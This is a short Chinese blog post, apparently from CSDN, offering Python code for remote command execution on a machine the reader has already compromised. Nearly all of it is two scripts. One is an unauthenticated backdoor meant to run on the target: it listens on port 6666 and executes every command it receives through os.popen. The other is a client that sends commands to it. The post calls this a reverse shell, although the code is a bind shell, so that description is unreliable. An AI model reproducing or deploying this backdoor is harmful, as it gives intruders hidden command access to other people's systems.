利用python模拟菜刀反弹shell绕过限制-CSDN博客

有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell

主要用到python os库和sokect库

这里的服务端在目标机上运行

from socket import *
from os import *
s=socket(AF_INET,SOCK_STREAM)#IVP4 寻址  tcp协议
s.bind(('',6666))#补丁端口
s.listen(1)#开始监听一个队列
while True:
    sock,addr=s.accept()#返回两次 第一次返回连接地址 二 端口号
    print ('客户端：',addr)
    while True:
        cmd=sock.recv(1024)#缓存长度 接收传递过来
        cmdstr=cmd.decode()
        if cmdstr=='exit':
            print ('客户端：',addr,'关闭')
            sock.close()
            break
        result=popen(cmdstr).read()
        sock.send(result.encode())
s.close()

本机运行

from socket import *
from os import *

c=socket(AF_INET,SOCK_STREAM)#IVP4 寻址  tcp协议
c.connect(('127.0.0.1',6666))#连接地址
while True:
    cmd=input("cmd:")
    c.send(cmd.encode())#必须传递流
    if cmd=='exit':
        c.close()
        break
    data=c.recv(1014)
    print (data.decode())